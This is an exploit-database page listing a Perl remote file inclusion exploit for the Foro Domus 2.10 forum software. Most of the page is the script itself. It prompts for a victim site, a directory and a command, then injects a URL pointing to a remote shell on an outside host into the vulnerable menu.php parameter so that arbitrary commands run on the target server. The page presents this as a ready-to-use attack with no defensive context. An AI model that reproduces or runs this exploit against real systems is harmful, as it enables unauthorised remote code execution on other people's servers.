[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Foro Domus 2.10 (phpbb_root_path) Remote File Include Exploit

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1438
Category
web applications
Date add
28-01-2007
Platform
unsorted
=============================================================
Foro Domus 2.10 (phpbb_root_path) Remote File Include Exploit
=============================================================



# (C) xoron
#
# [Name: Foro Domus v2.10 (phpbb_root_path) Remote File Include Exploit]
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [xoron.biz]
#
# [Thanx:kacper, k1tk4t, SHiKA, can bjorn]
#
# [Tesekkurler: chaos, pang0]
#
# 
#
$rfi = "menu.php?sesion_idioma="; 
$path = "/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac.k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) xoron - xoron.biz\n$thx: pang0, chaos\n";
sleep 3;
system("start $acacaz");
}



#  0day.today [2024-09-28]  #